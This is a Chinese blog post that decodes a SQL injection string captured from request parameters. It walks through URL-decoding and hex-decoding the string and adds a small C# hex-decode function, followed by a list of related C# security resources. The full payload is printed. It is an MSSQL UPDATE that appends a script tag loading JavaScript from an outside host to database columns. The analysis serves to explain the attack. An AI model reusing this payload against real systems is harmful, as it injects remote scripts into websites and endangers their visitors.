`
pumaboyd
  • 浏览: 249552 次
  • 性别: Icon_minigender_1
  • 来自: 上海
社区版块
存档分类
最新评论

C# 解密一段SQL注入脚本

阅读更多

大概输入的一段参数

exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20f"

1:看到 %20%2b,很显然这是URLEncode,通过Server.UrlDecode方法解密得到
exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') f

2:可以很清楚的看到cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67)) 这段也是编过码的。看到ox开头应该是16进制。
最简单的方式是在MSSQL中运行

SELECT cast(0x223E223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))

就可以看到如下结果:

">"></title><script src=http://s.see9.us/s.js></script><!--

但为了以后方便。写了一段C#代码:
public static string Decode(string decode)
    {
        string result = "";
        for (int i = 0; i < decode.Length / 2; i++)
        {
            result += (char)short.Parse(decode.Substring(i * 2, 2), global::System.Globalization.NumberStyles.HexNumber);
        }
        return result;
    }

分享到:
评论

相关推荐

    C#实现登陆程序(MD5加密和SQL存储过程防注入攻击)

    在本文中,我们将深入探讨如何使用C#编程语言来实现一个登录程序,该程序结合了MD5加密技术和SQL存储过程,以确保用户密码的安全并防止SQL注入攻击。首先,我们来了解一下这两个关键技术。 MD5(Message-Digest ...

    sql server 中进行des加密

    在给定的文件名"SQLEncryption"中,可能包含示例代码、数据库脚本或相关的教程资源,这些资源可以帮助你更好地理解和实现SQL Server与C#中的DES加密和解密功能。在实践中,确保遵循最佳安全实践,如定期更换密钥,...

    《C# 数据安全手册》清晰PDF电子版[201903]

    《C# 数据安全手册》是一本专注于C#编程语言中数据安全领域的专业书籍,主要针对2019年3月前后的技术环境。这本手册深入探讨了如何在使用C#进行软件开发时确保数据的安全性,防止未经授权的访问、篡改或泄露。通过...

    代码审计之彩虹代刷网系统1

    在本文中,我们将深入探讨一个针对某代刷网站系统的代码审计案例,该系统可能存在多种安全问题,特别是SQL注入漏洞。 首先,【标题】提到的“代码审计之彩虹代刷网系统1”是一个关于网络安全专家对代刷网站进行安全...

    C#390-口令加密Exe源代码

    10. **代码审计**:对源代码进行定期的安全审计,确保遵循最佳安全实践,避免出现如SQL注入、跨站脚本(XSS)等常见的安全漏洞。 总之,"C#390-口令加密Exe源代码"是一个关于密码学和C#编程的实用示例,通过深入...

    C#数据安全手册

    SQL注入是一种常见的安全威胁,攻击者可以通过在输入字段中插入恶意SQL语句来获取敏感信息或破坏数据库。在C#中,可以使用参数化查询或者存储过程来避免SQL注入攻击。 #### 3.3 防止XSS攻击 跨站脚本攻击(XSS)是...

    C#数据安全手册(PDF)

    1. 输入验证:对用户输入进行严格的检查,防止SQL注入、跨站脚本攻击(XSS)等。 2. 安全编码:遵循OWASP(开放式网络应用安全项目)的最佳实践,如避免硬编码密码,及时修复漏洞。 3. 异常处理:正确捕获和处理异常...

    《C# 数据安全手册》清晰PDF电子版(十分经典)

    4. **数据库安全**:在C#中与SQL Server或其他数据库交互时,如何使用参数化查询、存储过程防止SQL注入攻击,以及如何设置数据库用户权限和角色。 5. **代码安全性**:讨论代码签名、强命名和混淆技术,以保护代码...

    c# web登陆源代码

    2. SQL注入防护:使用参数化查询或ORM框架避免SQL注入攻击。 3. CSRF防护:对于敏感操作如登出,使用CSRF令牌防止跨站请求伪造。 八、WebApplication7项目结构 在提供的“WebApplication7”项目中,可能包含以下...

    C# P2PMessage 源码

    【C# P2PMessage 源码】项目是一个基于C#编程语言实现的点对点(P2P)聊天程序。此项目的核心是构建一个能够实现用户间直接通信的系统,无需通过中心服务器作为中介,从而提高了通信的效率和隐私性。下面将详细介绍...

    C# NET WEB 学习 源代码 Security.zip

    4. **跨站脚本攻击(XSS)** 防御:XSS攻击是一种常见的Web安全威胁,攻击者通过注入恶意脚本来窃取用户数据。C#提供了Anti-XSS库,如ASP.NET MVC的`HtmlHelper`类的`Encode`方法,用于自动转义输出,防止XSS攻击。 5...

    C#开发实战1200例(第Ⅱ卷)1、19、20、21共4章

    安全议题可能包括SQL注入防护、连接字符串的加密存储、权限管理以及事务处理。学习这一章将帮助开发者创建能够抵御数据库攻击的健壮应用。 最后,第二十一章聚焦于软件安全控制,这是现代软件开发不可或缺的一部分...

    JM的通用类库c#

    C#通用类库可以包括对字符串处理、数据库交互、数据加密与解密、富文本编辑器(如CKEditor)集成、PowerShell脚本支持以及Web应用开发等多种功能模块。 **描述:“涉及字符串转化,数据库操作,加密解密,ckeditor...

    C# Security

    1. **输入验证**:对用户输入进行严格的检查,避免SQL注入或跨站脚本攻击(XSS)。可以使用内置的验证控件或者自定义验证逻辑来实现。 2. **权限管理**:通过角色基础的权限控制,确保只有经过认证和授权的用户才能...

    C#开发实战1200例软件安全控制篇

    通过参数化查询和存储过程,可以防止SQL注入攻击。同时,对于数据库连接的管理和权限控制也是确保数据安全的关键。 八、安全日志与审计 记录和分析系统的操作日志对于排查安全问题和追踪攻击行为至关重要。C#提供了...

    c# winform实例大全(198个经典Csharp WinForm实例源码)

    这份“C# WinForm实例大全”包含了198个经典实例,覆盖了从基础控件操作到复杂系统交互的多个方面,对于正在学习或已经从事C# WinForm开发的朋友们来说,是一份极其宝贵的学习资源。 1. **控件操作**: 在C# ...

    C# 数据安全手册.rar

    4. **输入验证**:防止注入攻击(如SQL注入、跨站脚本攻击)的关键在于对用户输入进行严格的验证和清理。C#提供了各种验证控件和数据注解,可以帮助开发者构建安全的输入处理逻辑。 5. **异常处理**:合理的异常...

    《C# 数据安全手册》清晰PDF电子版

    3. 防止SQL注入:C#在数据库交互中,使用ADO.NET或其他ORM(对象关系映射)工具时,必须注意防止SQL注入攻击。书中会讲解如何使用参数化查询或存储过程来避免这类安全风险。 4. 安全的数据传输:HTTPS协议和SSL/TLS...

    《C# 数据安全手册》清晰PDF电子版.rar

    5. **输入验证**:防止SQL注入和跨站脚本(XSS)攻击的关键在于有效验证用户输入。C#提供了多种验证控件和函数,书中会讲述如何在Web或桌面应用中实现这些验证。 6. **数据持久化**:无论是使用关系型数据库如SQL ...

    《C# 数据安全手册》清晰PDF电子版_(0601).rar

    此外,防止跨站脚本攻击(XSS)、跨站请求伪造(CSRF)和SQL注入等常见网络攻击的方法也会有所涉及。 数据存储安全是另一个关键主题。在C#中,数据库操作是常见的,因此如何安全地存储和检索数据库中的数据至关重要...

Global site tag (gtag.js) - Google Analytics